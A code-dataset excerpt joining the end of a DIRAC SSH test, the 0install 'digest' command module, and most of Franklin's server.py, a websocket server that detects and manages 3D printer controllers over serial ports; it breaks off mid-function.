dataBatchSystemScript = bsc.read()
assert executeBatchContent in dataDest
assert dataBatchSystemScript in dataDest
# Test the execution of the remote control script
cmd = "python -m py_compile %s" % dest
args = shlex.split(cmd)
process = subprocess.Popen(args, universal_newlines=True)
process.communicate()
assert process.returncode == 0
# Delete the control script and the .pyc file associated
os.remove(source)
os.remove(dest)
if os.path.isfile("%sc" % dest):
os.remove("%sc" % dest)
|
DIRACGrid/DIRAC
|
src/DIRAC/Resources/Computing/test/Test_SSHComputingElement.py
|
Python
|
gpl-3.0
| 2,459
|
[
"DIRAC"
] |
8b41a3a9eb0cabd04daf914a2584b40a6c316c263ad6dfcd37f0d8cf5d3b9da7
|
"""
The B{0install digest} command-line interface.
"""
# Copyright (C) 2011, Thomas Leonard
# See the README file for details, or visit http://0install.net.
from __future__ import print_function
import os, tempfile
from zeroinstall import SafeException, _
from zeroinstall.zerostore import manifest, unpack
from zeroinstall.cmd import UsageError
from zeroinstall import support
syntax = "DIRECTORY | ARCHIVE [EXTRACT]"
def add_options(parser):
parser.add_option("", "--algorithm", help=_("the hash function to use"), metavar="HASH")
parser.add_option("-m", "--manifest", help=_("print the manifest"), action='store_true')
parser.add_option("-d", "--digest", help=_("print the digest"), action='store_true')
def handle(config, options, args):
"""@type args: [str]"""
if len(args) == 1:
extract = None
elif len(args) == 2:
extract = args[1]
else:
raise UsageError()
source = args[0]
alg = manifest.algorithms.get(options.algorithm or 'sha1new', None)
if alg is None:
raise SafeException(_('Unknown algorithm "%s"') % alg)
show_manifest = bool(options.manifest)
show_digest = bool(options.digest) or not show_manifest
def do_manifest(d):
if extract is not None:
d = os.path.join(d, extract)
digest = alg.new_digest()
for line in alg.generate_manifest(d):
if show_manifest:
print(line)
digest.update((line + '\n').encode('utf-8'))
if show_digest:
print(alg.getID(digest))
if os.path.isdir(source):
if extract is not None:
raise SafeException("Can't use extract with a directory")
do_manifest(source)
else:
data = None
tmpdir = tempfile.mkdtemp()
try:
data = open(args[0], 'rb')
unpack.unpack_archive(source, data, tmpdir, extract)
do_manifest(tmpdir)
finally:
support.ro_rmtree(tmpdir)
if data:
data.close()
def complete(completion, args, cword):
"""@type completion: L{zeroinstall.cmd._Completion}
@type args: [str]
@type cword: int"""
if len(args) != 1: return
completion.expand_files()
|
slovenwd/0install
|
zeroinstall/cmd/digest.py
|
Python
|
lgpl-2.1
| 1,983
|
[
"VisIt"
] |
c733abcf24fe0656062e229a984c8ae2a8cfd8af35848332a84f26ad6bda390a
|
#!/usr/bin/python3
# vim: foldmethod=marker :
# Documentation. {{{
# server.py - machine multiplexing for Franklin {{{
# Copyright 2014-2016 Michigan Technological University
# Copyright 2016 Bas Wijnen <wijnen@debian.org>
# Copyright 2017 Lorin Edwin Parker <lorin.parker@hive13.org>
# Author: Bas Wijnen <wijnen@debian.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# }}}
# File documentation. {{{
'''@file
This is the main program. It runs a WebSockets server and starts driver.py
processes when new machines are detected. It sends any requests it doesn't
handle itself to those processes.
This file is installed as "franklin" in the executable path. When run, it
accepts the following options (prefix with "--" on the commandline, or use as
is in a configuration file):
* port: which port to listen on for requests. Default: 8000
* address: which address to bind to. If set to empty, it binds the both
0.0.0.0 and ::1, so it responds to both IPv4 and IPv6 requests. If IPv6 is
not supported (this is currently the case on the Raspberry Pi), you need to
explicitly set it to 0.0.0.0 or the server will not start. This can also be
used to listen only on one interface, by setting it to the local address of
that interface. Default: ''
* machine: default machine for new client connections. Leave empty to use the
first detected machine. Default: ''
* blacklist: regular expression of serial ports that detection should not be
attempted on. This should normally not be used. add-blacklist should be
used instead.
* add-blacklist: same as blacklist. However, add-blacklist has a empty
default, so it can be used to add ports to the standard blacklist, as opposed
to replacing it.
* noautodetect: if not set, communication is attempted on newly detected ports.
This is normally good, but it can be disabled if autodetection prevents
flashing new firmware, or if it is unclear which ports should be blacklisted
and Franklin must not interfere with some ports. Default: True
* predetect: system command that is run before detection is attempted. The
substring #PORT# is replaced with the port. Use this to set up the port.
Default: ``stty -F #PORT# raw 115200 -echo -echoe -echok -echoke -echonl -echoprt``
* allow-system: regular expression for commands that are allowed to be run from
G-Code. Default: '^$'
* admin: Credentials for accessing the /admin interface. This can either be a
password, or a username:password pair. If only a password is supplied, any
username is accepted with that password. Default: ''
* expert: Credentials for accessing the /expert interface. This can either be a
password, or a username:password pair. If only a password is supplied, any
username is accepted with that password. Default: ''
* user: Credentials for accessing the default interface. This can either be a
password, or a username:password pair. If only a password is supplied, any
username is accepted with that password. Default: ''
* done: system command to run after completing a job. Default: ''
* log: passed on to the websockets server, which uses it to create a log file
with websockets traffic.
* tls: passed on to the websockets server, which uses it to enable encryption.
Default: True
'''
# }}}
# Main page documentation. {{{
'''@mainpage
This is the documentation for Franklin that was generated from its source code.
It is meant to help people make changes to the code, and as a reference for
people who write programs that access Franklin with a WebSocket.
For the latter purpose, most of this documentation should be ignored. Two
classes are useful: Connection and Machine. Functions from those classes can
be called using RPC requests. In Machine, functions with a role prefix must be
called by a connections with at least those permissions. The prefix must not
be part of the RPC request.
'''
# }}}
# }}}
# Imports and config. {{{
import re
import os
import sys
import math
import random
import network
import websocketd
from websocketd import log
import fhs
import subprocess
import crypt
import time
import serial
import json
import traceback
import fcntl
import protocol
fhs.option('port', 'Port to listen on', default = '8000')
fhs.option('address', 'Address to listen on. Set to 0.0.0.0 to force IPv4 only', default = '')
fhs.option('whitelist', 'If set, only allow serial ports that match this regular expression', default = '')
fhs.option('blacklist', 'Disallow serial ports that match this regular expression', default = r'/dev/(input/.*|ptmx|console|tty(printk|(GS)?\d*))$')
fhs.option('add-blacklist', 'Also disallow serial ports that match this regular expression', default = r'^$')
fhs.option('noautodetect', 'Do not autodetect machines on new serial ports', argtype = bool)
fhs.option('predetect', 'Run this command prior to detecting a machine on a serial port', default = 'stty -F $PORT raw 115200 -echo -echoe -echok -echoke -echonl -echoprt')
fhs.option('controller', 'Run this command to handle a controller on a serial port', default = '/usr/lib/franklin/controller.py --dev "$PORT"')
fhs.option('allow-system', 'Only allow system commands that match this regular expression', default = '^$')
fhs.option('admin', 'Admin password', default = '')
fhs.option('expert', 'Expert user password', default = '')
fhs.option('user', 'Local user password', default = '')
fhs.option('remote', 'Remote user password', default = '')
fhs.option('done', 'Run this command when a job is done', default = '')
fhs.option('log', 'Enable logging to a given logfile')
fhs.option('tls', 'Enable TLS. It is recommended to let Apache handle this', argtype = bool)
config = fhs.init(packagename = 'franklin')
# }}}
# Global variables. {{{
httpd = None
ports = {}
autodetect = not config['noautodetect']
tls = config['tls']
machines = {}
log('whitelist: %s' % config['whitelist'])
# }}}
class Server(websocketd.RPChttpd): # {{{
def auth_message(self, connection, is_websocket):
path = connection.address.path
for extra in ('/', '/websocket'):
if path.endswith(extra):
path = path[:-len(extra)]
if path.endswith('/benjamin'):
connection.data['role'] = 'benjamin'
escalate = ()
down = ('admin', 'expert', 'user', 'remote',)
elif path.endswith('/admin'):
connection.data['role'] = 'admin'
escalate = ()
down = ('expert', 'user', 'remote',)
elif path.endswith('/expert'):
connection.data['role'] = 'expert'
escalate = ('admin',)
down = ('user', 'remote',)
elif path.endswith('/user'):
connection.data['role'] = 'user'
escalate = ('expert', 'admin',)
down = ('remote',)
else:
connection.data['role'] = 'remote'
escalate = ('user', 'expert', 'admin',)
down = ()
for role in escalate:
if config[role]:
break
connection.data['role'] = role
connection.data['pwd'] = config[connection.data['role'] if connection.data['role'] != 'benjamin' else 'admin']
if not connection.data['pwd']:
for role in down:
if config[role]:
connection.data['pwd'] = config[role]
break
return 'Please identify yourself for %s access' % connection.data['role'] if connection.data['pwd'] else None
def authenticate(self, connection):
if ':' in connection.data['pwd']:
return [connection.data['user'], connection.data['password']] == connection.data['pwd'].split(':', 1)
else:
return connection.data['password'] == connection.data['pwd']
def page(self, connection):
if 'machine' in connection.query:
# Export request.
machine = connection.query['machine'][0]
if machine not in machines or not isinstance(machines[machine], Machine):
self.reply(connection, 404)
else:
def export_reply(success, message):
self.reply(connection, 200, message.encode('utf-8'), 'text/plain;charset=utf-8')
connection.socket.close()
machines[machine].call('export_settings', (connection.data['role'],), {}, export_reply)
return True
elif connection.address.path.endswith('/adc'):
filename = '/tmp/franklin-adc-dump' # FIXME
if os.path.exists(filename):
message = open(filename, 'rb').read()
os.unlink(filename)
else:
message = b''
self.reply(connection, 200, message, 'text/plain;charset=utf-8')
elif any(connection.address.path.endswith('/' + x) for x in ('benjamin', 'admin', 'expert', 'user')):
websocketd.RPChttpd.page(self, connection, path = connection.address.path[:connection.address.path.rfind('/') + 1])
else:
websocketd.RPChttpd.page(self, connection)
def post(self, connection):
# Add to queue (POST).
if 'file' not in connection.post[1] or 'machine' not in connection.post[0] or 'action' not in connection.post[0]:
log('invalid post: {}'.format(connection.post))
self.reply(connection, 400)
return False
machine = connection.post[0]['machine'][0]
action = connection.post[0]['action'][0]
if machine not in machines or not isinstance(machines[machine], Machine):
log('machine not found: %s' % machine)
self.reply(connection, 404)
return False
# Count files, so we know when the connection should be closed.
# Use a list to make it accessible from the callback.
num = [len(connection.post[1]['file'])]
for post in connection.post[1].pop('file'):
def cb(success, ret, filename):
self.reply(connection, 200 if success else 400, b'' if ret is None else ret.encode('utf-8'), 'text/plain;charset=utf-8')
os.unlink(filename)
num[0] -= 1
if num[0] == 0:
connection.socket.close()
def cbwrap(filename):
'''This function makes sure that filename gets its own scope and is not changed by the for loop.'''
return lambda success, ret: cb(success, ret, filename)
if action == 'queue_add':
machines[machine].call('queue_add_POST', [connection.data['role'], post[0], post[1]], {}, cbwrap(post[0]))
elif action == 'probe_add':
machines[machine].call('probe_add_POST', [connection.data['role'], post[0], post[1]], {}, cbwrap(post[0]))
elif action == 'audio_add':
machines[machine].call('audio_add_POST', [connection.data['role'], post[0], post[1]], {}, cbwrap(post[0]))
elif action == 'import':
machines[machine].call('import_POST', [connection.data['role'], post[0], post[1]], {}, cbwrap(post[0]))
else:
cb(false, 'invalid POST action', post[0])
return True
# }}}
class Connection: # {{{
'''Object to handle a single network connection.
This class is used with the WebSocket RPC server. Functions in it can
be called from the remote end using RPC requests.
'''
## Currently active connections. Keys are their id, an int for internal use.
connections = {}
## Id for next connection.
nextid = 0
def __init__(self, socket): # {{{
'''Constructor, as required by python-websockets.
@param socket: remote end of RPC connection.
'''
socket.initialized = False
socket.monitor = False
socket.connection = self
self.socket = socket
self.id = Connection.nextid
Connection.nextid += 1
Connection.connections[self.id] = self
# Done with setup; activate connection.
self.socket()
# }}}
def get_ports(self): # {{{
return tuple(ports.keys())
# }}}
def get_machines(self): # {{{
return tuple(machines.keys())
# }}}
def detect(self, port): # {{{
return detect(port)
# }}}
def disable(self, machine, reason = 'disabled by user'): # {{{
assert self.socket.data['role'] in ('benjamin', 'admin', 'expert')
assert machine in machines
assert machines[machine].port
return disable(machine, reason)
# }}}
def remove_machine(self, machine): # {{{
assert self.socket.data['role'] in ('benjamin', 'admin')
assert machine in machines
machines[machine].remove_machine()
# }}}
def _get_command(self, board, port): # {{{
if board == 'bbbmelzi ':
return ('sudo', fhs.read_data(os.path.join('bb', 'flash-bb-0'), opened = False), fhs.read_data(os.path.join('bb', 'avrdude.conf'), opened = False), fhs.read_data(os.path.join('firmware', 'atmega1284p' + os.extsep + 'hex'), opened = False))
if board == 'bb4melzi ':
return ('sudo', fhs.read_data(os.path.join('bb', 'flash-bb-4'), opened = False), fhs.read_data(os.path.join('bb', 'avrdude.conf'), opened = False), fhs.read_data(os.path.join('firmware', 'atmega1284p' + os.extsep + 'hex'), opened = False))
if board == 'opi ':
return ('sudo', fhs.read_data(os.path.join('opi', 'flash-opi'), opened = False), fhs.read_data(os.path.join('opi', 'avrdude.conf'), opened = False), fhs.read_data(os.path.join('firmware', 'atmega1284p-12MHz' + os.extsep + 'hex'), opened = False))
boards = read_boards()
if board not in boards:
raise ValueError('board type not supported')
filename = fhs.read_data(os.path.join('firmware', boards[board]['build.mcu'] + os.extsep + 'hex'), opened = False)
if filename is None:
raise NotImplementedError('Firmware is not available')
return ('avrdude', '-D', '-q', '-q', '-p', boards[board]['build.mcu'], '-C', '/etc/avrdude.conf', '-b', boards[board]['upload.speed'], '-c', boards[board]['upload.protocol'], '-P', port, '-U', 'flash:w:' + filename + ':i')
# }}}
def upload(self, port, board): # {{{
wake = (yield)
assert self.socket.data['role'] in ('benjamin', 'admin')
assert port in ports
if ports[port]:
disable(ports[port], 'disabled for upload')
def cancel():
# Waking the generator kills the process.
wake('Aborted')
ports[port] = cancel
command = self._get_command(board, port)
data = ['']
log('Flashing firmware: ' + ' '.join(command))
broadcast(None, 'port_state', port, 3)
process = subprocess.Popen(command, stdin = subprocess.PIPE, stdout = subprocess.PIPE, stderr = subprocess.STDOUT, close_fds = True)
def output():
d = ''
try:
d = process.stdout.read().decode('utf-8')
except:
data[0] += '\nError writing %s firmware: ' % board + traceback.format_exc()
log(repr(data[0]))
wake(data[0])
return False
if d != '':
#broadcast(None, 'message', port, '\n'.join(data[0].split('\n')[-4:]))
data[0] += d
return True
wake(data[0])
return False
def error():
data[0] += '\nError writing %s firmware: ' % board
log(repr(data[0]))
wake(data[0])
return False
fl = fcntl.fcntl(process.stdout.fileno(), fcntl.F_GETFL)
fcntl.fcntl(process.stdout.fileno(), fcntl.F_SETFL, fl | os.O_NONBLOCK)
websocketd.add_read(process.stdout, output, error)
broadcast(None, 'uploading', port, 'uploading firmware for %s' % board)
#broadcast(None, 'message', port, '')
d = (yield)
try:
process.kill() # In case it wasn't dead yet.
except:
pass
try:
process.communicate() # Clean up.
except:
pass
broadcast(None, 'uploading', port, None)
#broadcast(None, 'message', port, '')
broadcast(None, 'port_state', port, 0)
ports[port] = None
if autodetect:
websocketd.call(None, detect, port)
if d:
return 'firmware upload for %s: ' % board + d
else:
return 'firmware for %s successfully uploaded' % board
# }}}
def upload_options(self, port): # {{{
return upload_options(port)
# }}}
def create_machine(self): # {{{
create_machine()
# }}}
def set_monitor(self, value): # {{{
if value:
self.socket.initialized = False
self.socket.autodetect.event(autodetect)
for p in ports:
self.socket.new_port.event(p, self.upload_options(p))
if ports[p] is None:
self.socket.port_state.event(p, 0)
elif not isinstance(ports[p], str): # TODO: distinguish initial detect from flashing.
self.socket.port_state.event(p, 3)
else:
self.socket.port_state.event(p, 2)
for p in machines:
machines[p].call('send_machine', [self.socket.data['role'], self.id], {}, lambda success, data: None)
self.socket.initialized = True
self.socket.monitor = value
# }}}
def get_monitor(self): # {{{
return self.socket.monitor
# }}}
def get_role(self): # {{{
return self.socket.data['role']
# }}}
def _call(self, name, a, ka): # {{{
wake = (yield)
#log('other: %s %s %s' % (name, repr(a), repr(ka)))
if 'machine' in ka:
machine = ka.pop('machine')
else:
machine = None
if machine not in machines:
if len(machines) == 1:
machine = tuple(machines.keys())[0]
else:
options = [m for m in machines if machines[m].port is not None]
if len(options) == 1:
machine = options[0]
else:
log('No active machine')
return ('error', 'No active machine')
if name.endswith('_POST'):
log('refusing to call function only meant for POST')
return ('error', 'Invalid function name')
def reply(success, ret):
if success:
wake(ret)
else:
log('machine errors')
wake(('error', ret))
#disable(machine, 'machine replied with error to wake up')
machines[machine].call(name, (self.socket.data['role'],) + tuple(a), ka, reply)
return (yield)
# }}}
def __getattr__ (self, attr): # {{{
return lambda *a, **ka: self._call(attr, a, ka)
# }}}
# }}}
def read_boards(): # {{{
boards = {}
for d in fhs.read_data('hardware', packagename = 'arduino', dir = True, multiple = True):
for board in os.listdir(d):
boards_txt = os.path.join(d, board, 'boards' + os.extsep + 'txt')
if not os.path.exists(boards_txt):
continue
with open(boards_txt) as b:
for line in b:
if line.startswith('#') or line.strip() == '':
continue
parse = re.match('([^.=]+)\.([^=]+)=(.*)$', line.strip())
if parse is None:
log('Warning: invalid line in %s: %s' % (boards_txt, line.strip()))
continue
tag, option, value = parse.groups()
if tag not in boards:
boards[tag] = {}
if option in boards[tag]:
if boards[tag][option] != value:
log('%s: duplicate tag %s.%s with different value (%s != %s); using %s' % (boards_txt, tag, option, value, boards[tag][option], boards[tag][option]))
continue
boards[tag][option] = value
for tag in tuple(boards.keys()):
if 'name' not in boards[tag]:
boards[tag]['name'] = tag
if any(x not in boards[tag] for x in ('upload.protocol', 'upload.speed', 'build.mcu', 'upload.maximum_size')):
#log('skipping %s because hardware information is incomplete (%s)' % (boards[tag]['name'], repr(boards[tag])))
del boards[tag]
continue
if int(boards[tag]['upload.maximum_size']) < 30000:
# Not enough memory; don't complain about skipping this board.
del boards[tag]
continue
if fhs.read_data(os.path.join('firmware', boards[tag]['build.mcu'] + os.extsep + 'hex'), opened = False) is None:
#log('skipping %s because firmware for %s is not installed' % (boards[tag]['name'], boards[tag]['build.mcu']))
del boards[tag]
continue
return boards
# }}}
def upload_options(port): # {{{
ret = []
if port in ('/dev/ttyS0', '/dev/ttyO0'):
ret += [('bbbmelzi ', 'Melzi from BeagleBone (atmega1284p, bridgeboard v1)')]
elif port in ('/dev/ttyS4', '/dev/ttyO4'):
ret += [('bb4melzi ', 'Melzi from BeagleBone (atmega1284p, bridgeboard v2)')]
elif port == '/dev/ttyS1':
ret += [('opi ', 'Athena on OrangePi Zero (atmega1284p at 12MHz)')]
boards = read_boards()
ret += list((tag, '%s (%s, %s, %d baud)' % (boards[tag]['name'], boards[tag]['build.mcu'], boards[tag]['upload.protocol'], int(boards[tag]['upload.speed']))) for tag in boards)
ret.sort(key = lambda x: (boards[x[0]]['build.mcu'] if x[0] in boards else '', x[1]))
return ret
# }}}
def broadcast(target, name, *args): # {{{
if target is not None:
#log('broadcasting to target %d' % target)
if target not in Connection.connections:
log('ignoring targeted broadcast of %s to missing connection %s' % (repr((name, args)), target))
return
target = Connection.connections[target].socket
if target.monitor:
#log('%s %s' % (name, repr(args)))
getattr(target, name).event(*args)
else:
log("not broadcasting to target, because it isn't set to monitor")
elif httpd:
#log('broadcasting to all: %s' % repr((name, args)))
for c in httpd.websockets:
if c.monitor and c.initialized:
#log('broadcasting to one')
getattr(c, name).event(*args)
# }}}
class Machine: # {{{
def __init__(self, port, process, run_id, send = True): # {{{
'''Create a new Machine object.
This can be called for several reasons:
- At startup, every saved machine is started. In this case, port is None.
- When a new machine with an unknown uuid is detected on a port. In this case, port and run_id are set.
'''
if port is not None:
self.detecting = True
broadcast(None, 'port_state', port, 1)
self.name = None
self.uuid = None
self.port = port
self.run_id = run_id
self.process = process
self.waiters = ({}, {}, {})
self.next_mid = 0
self.buffer = b''
fl = fcntl.fcntl(process.stdout.fileno(), fcntl.F_GETFL)
fcntl.fcntl(process.stdout.fileno(), fcntl.F_SETFL, fl | os.O_NONBLOCK)
self.input_handle = websocketd.add_read(process.stdout, self.machine_input, self.machine_error)
def get_vars(success, vars, cb = None):
if not success:
log('failed to get vars')
return
if self.uuid is None:
log('new uuid:' + repr(vars['uuid']))
self.uuid = vars['uuid']
else:
assert self.uuid == vars['uuid']
self.detecting = False
self.call('send_machine', ['admin', None], {}, lambda success, data: broadcast(None, 'port_state', port, 2))
if cb is not None:
cb()
if send:
self.call('get_globals', ('admin',), {}, get_vars)
else:
def finish(cb):
self.call('get_globals', ('admin',), {}, lambda success, vars: get_vars(success, vars, cb))
del self.finish
self.finish = finish
# }}}
def call(self, name, args, kargs, cb): # {{{
#log('calling {}'.format(repr((name, args, kargs))))
data = json.dumps([self.next_mid, name, args, kargs]) + '\n'
#log('calling %s on %d' % (repr(data), self.process.stdin.fileno()))
try:
self.process.stdin.write(data.encode('utf-8'))
self.process.stdin.flush()
except:
log('killing machine handle because of error')
#traceback.print_exc()
def kill():
cb(False, None)
disable(self.uuid, 'error from machine')
# Schedule this as a callback, so the generator isn't called recursively.
websocketd.add_idle(kill)
return
#def debug_cb(success, ret):
# log('call {} returned: {}: {}'.format(name, success, ret))
# cb(success, ret)
self.waiters[0][self.next_mid] = cb
self.next_mid += 1
# }}}
def movewait(self, cb): # {{{
self.waiters[1][self.next_mid] = cb
self.next_mid += 1
# }}}
def tempwait(self, cb): # {{{
self.waiters[2][self.next_mid] = cb
self.next_mid += 1
# }}}
def machine_error(self): # {{{
log('%s died from error; removing port.' % self.name)
self.die('from error')
del ports[self.port]
return False
# }}}
def die(self, reason = 'at request'): # {{{
log('{} died {}.'.format(self.uuid, reason))
websocketd.remove_read(self.input_handle)
try:
self.process.kill()
except:
pass
try:
self.process.communicate()
except:
pass
self.process = None
for t in range(3):
for w in self.waiters[t]:
self.waiters[t][w](False, 'Machine {} died {}'.format(self.uuid, reason))
if self.uuid in machines:
del machines[self.uuid]
# }}}
def machine_input(self): # {{{
while self.process is not None:
data = self.process.stdout.read()
if data is None:
#log('%s: no data now' % self.name)
# No more data.
return True
if data == b'':
# Connection closed.
self.die('because there was an error')
return False
self.buffer += data
#log('machine input:' + repr(data))
while b'\n'[0] in self.buffer:
pos = self.buffer.index(b'\n'[0])
line = self.buffer[:pos]
self.buffer = self.buffer[pos + 1:]
data = json.loads(line.decode('utf-8'))
#log('machine command input:' + repr(data))
if data[1] == 'broadcast':
broadcast(data[2], data[3], self.uuid, *(data[4:]))
elif data[1] == 'disconnect':
port = self.port
ports[self.port] = None
broadcast(None, 'port_state', port, 0)
#if autodetect:
# websocketd.call(None, detect, port)
elif data[1] == 'error':
if data[0] is None:
# Error on command without id.
log('error on command without id: %s' % repr(data))
else:
self.waiters[0].pop(data[0])(False, data[2])
elif data[1] == 'return':
self.waiters[0].pop(data[0])(True, data[2])
elif data[1] == 'movecb':
self.waiters[1].pop(data[0])(True, data[2])
elif data[1] == 'tempcb':
self.waiters[2].pop(data[0])(True, data[2])
else:
raise AssertionError('invalid reply from machine process: %s' % repr(data))
# }}}
def remove_machine(self): # {{{
def finish():
broadcast(None, 'del_machine', self.uuid)
del machines[self.uuid]
self.call('die', ['admin', 'Machine is removed'], {}, lambda success, ret: self.die('because it was removed'))
if self.port and ports[self.port]:
assert ports[self.port] == self.uuid
self.call('disconnect', ['admin'], {}, lambda success, ret: finish())
else:
finish()
# }}}
# }}}
def nextid(): # {{{
global last_id
# 0x23456789 is an arbitrary number with bits set in every nybble, that is
# odd(so it doesn't visit the same number twice until it did all of
# them, because it loops at 2**32, which is not divisible by anything
# except 2).
last_id = (last_id + 0x23456789) & 0xffffffff
return bytes([id_map[(last_id >> (4 * c)) & 0xf] for c in range(8)])
last_id = random.randrange(1 << 32)
# Parity table is [0x8b, 0x2d, 0x1e]; half of these codes overlap with codes from the single command map; those single commands are not used.
id_map = [0x40, 0xe1, 0xd2, 0x73, 0x74, 0xd5, 0xe6, 0x47, 0xf8, 0x59, 0x6a, 0xcb, 0xcc, 0x6d, 0x5e, 0xff]
# }}}
# TODO: see if this should be used again.
def job_done(port, completed, reason): # {{{
broadcast(None, 'running', port.port, False)
if config['done']:
cmd = config['done']
cmd = cmd.replace('[[STATE]]', 'completed' if completed else 'aborted').replace('[[REASON]]', reason)
log('running %s' % cmd)
p = subprocess.Popen(cmd, stdout = subprocess.PIPE, shell = True, close_fds = True)
def process_done():
data = p.stdout.read()
if data:
log('Data from completion callback: %s' % repr(data))
return True
log('Callback for job completion done; return: %s' % repr(p.wait()))
return False
def process_error():
log('Job completion process returned error.')
return False
websocketd.add_read(p.stdout, process_done, process_error)
# }}}
def disable(uuid, reason): # {{{
if uuid is not None and not isinstance(uuid, str):
uuid()
return
if uuid not in machines:
log('not disabling nonexistent machine %s' % uuid)
return
p = machines[uuid]
if p.port not in ports:
log("not disabling machine which isn't enabled")
return
p.call('disconnect', ('admin', reason), {}, lambda success, ret: None)
port = p.port
ports[port] = None
p.port = None
broadcast(None, 'port_state', port, 0)
# }}}
class Admin_Connection: # {{{
def __init__(self, remote): # {{{
self.remote = remote
remote.readlines(self.read)
remote.disconnect_cb(lambda connection, data: data)
# }}}
def read(self, line): # {{{
if line.strip() == '':
return
try:
action, dev = line.split(None, 1)
except:
log('invalid command on admin socket: %s' % line)
return
if action == 'add':
add_port(dev.strip())
elif action == 'remove':
remove_port(dev.strip())
else:
log('invalid action on admin socket: %s' % line)
# }}}
# }}}
def remove_port(port): # {{{
log('removing port %s' % port)
if port not in ports:
return
if ports[port]:
disable(ports[port], 'port is removed')
del ports[port]
broadcast(None, 'del_port', port)
# }}}
def add_port(port): # {{{
if port in ports:
log('already existing port %s cannot be added' % port)
return
if not re.match(config['whitelist'], port) or re.match(config['blacklist'], port) or re.match(config['add-blacklist'], port):
#log('skipping blacklisted or non-whitelisted port %s' % port)
return
ports[port] = None
broadcast(None, 'new_port', port, upload_options(port))
broadcast(None, 'port_state', port, 0)
if autodetect:
websocketd.call(None, detect, port)
# }}}
def detect(port): # {{{
log('detecting machine on %s' % port)
if port not in ports:
log('port does not exist')
return
if ports[port] != None:
# Abort detection in progress.
if ports[port]:
disable(ports[port], 'disabled to prepare for detection')
if ports[port] != None:
# This should never happen.
log('BUG: port is not in detectable state. Please report this.')
return
broadcast(None, 'port_state', port, 1)
if port == '-' or port.startswith('!'):
run_id = nextid()
process = subprocess.Popen((fhs.read_data('driver.py', opened = False), '--uuid', '-', '--allow-system', config['allow-system']) + (('--system',) if fhs.is_system else ()), stdin = subprocess.PIPE, stdout = subprocess.PIPE, close_fds = True)
machines[port] = Machine(port, process, run_id)
ports[port] = port
return False
if not os.path.exists(port):
log("not detecting on %s, because file doesn't exist." % port)
return False
if config['predetect']:
env = os.environ.copy()
env['PORT'] = port
subprocess.call(config['predetect'], env = env, shell = True)
try:
machine = serial.Serial(port, baudrate = 115200, timeout = 0)
except serial.SerialException as e:
log('failed to open serial port %s (%s).' % (port, str(e)))
del ports[port]
#traceback.print_exc()
return False
# We need to get the machine id first. If the machine is booting, this can take a while.
id = [None, None, None, None] # data, timeouts, had data
# Wait to make sure the command is interpreted as a new packet.
def part2():
id[0] = b''
id[1] = 0
id[2] = False
def timeout():
id[1] += 1
if id[1] >= 30:
# Timeout. Give up.
websocketd.remove_read(watcher)
machine.close()
log('Timeout waiting for machine on port %s; giving up.' % port)
ports[port] = None
broadcast(None, 'port_state', port, 0)
return
if not id[2]:
machine.write(protocol.single['ID'])
else:
id[2] = False
timeout_handle[0] = websocketd.add_timeout(time.time() + .5, timeout)
def boot_machine_input():
id[2] = True
ids = [protocol.single[code][0] for code in ('ID', 'STARTUP')]
# CMD:1 ID:8 + 16 Checksum:9 Total: 34
while len(id[0]) < 34:
try:
data = machine.read(34 - len(id[0]))
except OSError:
continue
except IOError:
continue
id[0] += data
#log('incomplete id: ' + id[0])
if len(id[0]) < 34:
if len(id[0]) > 0 and id[0][0] == protocol.single['CONTROLLER'][0]:
# This is a controller. Spawn the process, then cancel this detection.
websocketd.remove_timeout(timeout_handle[0])
machine.close()
ports[port] = None
broadcast(None, 'port_state', port, 0)
log('Starting controller driver on ' + port)
env = os.environ.copy()
env['PORT'] = port
subprocess.Popen(config['controller'], env = env, shell = True)
return False
return True
if id[0][0] not in ids or not protocol.check(id[0]):
log('skip non-id: %s (%s)' % (''.join('%02x' % x for x in id[0]), repr(id[0])))
f = len(id[0])
for start in ids:
if start in id[0][1:]:
p = id[0].index(bytes((start,)), 1)
if p < f:
f = p
log('Keeping some')
if f == 0:
f = 1
id[0] = id[0][f:]
return True
# We have something to handle; cancel the timeout, but keep the serial port open to avoid a reset. (I don't think this even works, but it doesn't hurt.)
websocketd.remove_timeout(timeout_handle[0])
# This machine was running and tried to send an id. Check the id.
uuid = id[0][9:9 + 16]
if (uuid[7] & 0xf0) != 0x40 or (uuid[9] & 0xc0) != 0x80:
# Broken uuid; create a new one and set it.
log('broken uuid: ' + repr(uuid))
uuid = None
else:
uuid = ''.join('%02x' % x for x in uuid[:16])
uuid = uuid[:8] + '-' + uuid[8:12] + '-' + uuid[12:16] + '-' + uuid[16:20] + '-' + uuid[20:32]
id[0] = id[0][1:9]
running_machine = [p for p in machines if machines[p].run_id == id[0]]
assert len(running_machine) < 2
if len(running_machine) > 0:
p = running_machine[0]
assert p.uuid == uuid
if p.port is not None:
disable(p.uuid, 'disabled machine which was detected on different port')
log('rediscovered machine %s on %s' % (''.join('%02x' % x for x in id[0]), port))
ports[port] = p.uuid
p.port = port
def close_port(success, data):
log('reconnect complete; closing server port')
machine.close()
p.call('reconnect', ['admin', port], {}, lambda success, ret: (ports[port].call('send_machine', ['admin', None], {}, close_port) if success else close_port()))
broadcast(None, 'port_state', port, 2)
return False
run_id = nextid()
# Find uuid or create new Machine object.
if uuid in machines:
log('accepting known machine on port %s (uuid %s)' % (port, uuid))
machines[uuid].port = port
ports[port] = uuid
log('connecting %s to port %s' % (uuid, port))
machines[uuid].call('connect', ['admin', port, [chr(x) for x in run_id]], {}, lambda success, ret: None)
else:
log('accepting unknown machine on port %s' % port)
# Close detect port so it doesn't interfere.
machine.close()
#log('machines: %s' % repr(tuple(machines.keys())))
process = subprocess.Popen((fhs.read_data('driver.py', opened = False), '--uuid', uuid if uuid is not None else '', '--allow-system', config['allow-system']) + (('--system',) if fhs.is_system else ()), stdin = subprocess.PIPE, stdout = subprocess.PIPE, close_fds = True)
new_machine = Machine(port, process, run_id, send = False)
def finish():
log('finish detect %s' % repr(uuid))
ports[port] = uuid
machines[uuid] = new_machine
log('connecting new machine %s to port %s' % (uuid, port))
new_machine.call('connect', ['admin', port, [chr(x) for x in run_id]], {}, lambda success, ret: None)
if uuid is None:
def prefinish(success, uuid):
assert success
